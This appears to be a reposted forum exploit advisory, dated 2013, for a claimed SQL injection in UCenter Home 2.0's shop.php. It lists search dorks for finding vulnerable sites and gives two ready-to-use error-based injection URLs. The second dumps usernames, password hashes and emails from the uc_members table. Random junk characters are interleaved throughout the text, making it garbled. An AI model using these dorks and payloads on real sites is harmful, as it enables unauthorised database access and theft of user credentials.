* X: D0 ~ o) Q/ V. y__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
) i: G0 K$ o' F; S0 d7 \" d: W. e3 i! h& [
! X; l* l! u0 m! Y% r I$ w
- G8 b2 R* r' h* w) S*/ Author : KnocKout + ]4 C5 Z# d+ s+ Z/ p0 t# E
% e1 t6 M; r$ u0 J- w; b
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ' _- |& J; n0 h& f
6 X& O9 ]5 A( ?' ^7 ]9 H' \*/ Contact: knockoutr@msn.com
0 ^! C, i- e' s. }$ a y/ N) S# T. b
*/ Cyber-Warrior.org/CWKnocKout 9 w, J$ z' s" ~/ Z5 Y/ \, v/ w( y$ M+ a
5 r. b. F! _9 y$ f. Q) _
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , ]& v3 V6 @$ T; ]
: Y9 s0 P: k8 z9 |
Script : UCenter Home & ]$ U6 Z$ U/ U! i7 Q
6 r6 ]2 r" i! ZVersion : 2.0 7 J I/ ^2 M( y! ?) r
4 L/ |1 T1 B7 _
Script HomePage : http://u.discuz.net/
5 ^% B8 m' X! E4 r. \$ e9 r: d+ M" i! a( x; ]8 S; _" W. }- T
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 o9 s' e( X, z8 J# y1 }, e! Y
4 }2 f6 X$ @ d# p1 K$ BDork : Powered by UCenter inurl:shop.php?ac=view
! n ~8 n0 e0 C7 `4 n5 f9 C
* P# |& W& i- T/ m3 [5 w2 |% s; XDork 2 : inurl:shop.php?ac=view&shopid= , [8 @7 W4 O" J( A5 Y6 }2 W2 Z
! D) A' |8 a6 k. k1 }+ c6 }
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" l# ~# A" [( u: y5 h
9 ~' B5 y4 v% U& m. S) a" i' v# AVuln file : Shop.php $ G8 c3 [1 V9 Z K8 @4 l/ I
' a6 [$ K6 H9 e6 _
value's : (?)ac=view&shopid=
$ f2 }; g% Z& j" T: i) P7 f) P! J1 O! B( q
Vulnerable Style : SQL Injection (MySQL Error Based) ' h" r+ O( \+ F/ F. q
% y/ |! H7 r; C! r$ a# ?
Need Metarials : Hex Conversion : b2 [3 l9 o, C1 ~% ], ?/ q9 X
* o2 s/ @$ `. r/ u' N& H__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) l- h0 \2 F% P" ?9 {; A: J& a7 L+ i. Q( B% G3 P- U8 J ^
Your Need victim Database name.
+ a6 n6 E& R3 `; D/ l8 o" O% ]* q j& a8 ^6 H! d# Q
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
0 }$ c5 l6 l! e/ Z+ s6 a: M' U, h" z2 Z$ T* [2 d8 b& M
..
8 ?7 z h, h& L" g# o7 N" x' w: L! B! `: h0 a% n0 D H
DB : Okey. ; s: v" o& ]/ F' S$ a1 K
( v ]7 X& J3 Z8 X
your edit DB `[TARGET DB NAME]` ) W3 Z) k$ r1 i
# `( R1 ?9 K" S. J- Y6 a8 bExample : 'hiwir1_ucenter' * q$ O" K z; U, n4 W: _, k9 o
! T2 N2 R' K p1 r$ f0 v$ y/ `Edit : Okey. : D& `8 A3 @0 }3 `; Z4 n. Y
x$ Y( j {& f2 r' O7 n2 u7 OYour use Hex conversion. And edit Your SQL Injection Exploit..
2 [/ _* {& \$ ^' T$ \0 `( N
8 U+ Z# S' w; a 1 u. e$ B4 G& E4 K
4 G- T1 G8 a" ?- @
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
. N- v2 b. a$ m# \6 y( C8 m |
发表于 2013-2-27 21:31:31
收藏
支持
反对